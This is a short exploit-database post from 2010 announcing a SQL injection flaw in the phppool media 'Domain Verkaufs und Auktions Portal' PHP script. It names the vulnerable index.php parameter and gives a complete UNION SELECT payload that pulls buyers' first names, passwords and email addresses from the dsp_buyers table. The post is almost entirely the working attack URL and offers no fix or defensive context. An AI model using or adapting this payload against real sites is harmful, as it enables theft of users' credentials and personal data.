Home / os / winme

phppool media Domain Verkaufs und Auktions Portal SQL Inject

Posted on 14 March 2010

=========================================================================
phppool media Domain Verkaufs und Auktions Portal index.php SQL Injection
=========================================================================

----------------------------Information------------------------------------------------
+Name : phppool media Domain Verkaufs und Auktions Portal index.php SQL Injection
+Autor : Easy Laster
+Date   : 14.03.2010
+Script  : phppool Domain Verkaufs und Auktions Portal
 
+Language :PHP
+Discovered by Easy Laster

----------------------------------------------------------------------------------------
+Vulnerability : http://www.site.com/portal/index.php?a=d&id=
+Exploitable   : http://www.site.com/portal/index.php?a=d&id=-11111111111+union+select
+1,2,concat(firstname,0x3a,password,0x3a,email),4,5,6,7,8,9,10,11+from+dsp_buyers--
-----------------------------------------------------------------------------------------


# ~  - [ [ : Inj3ct0r : ] ]

 

TOP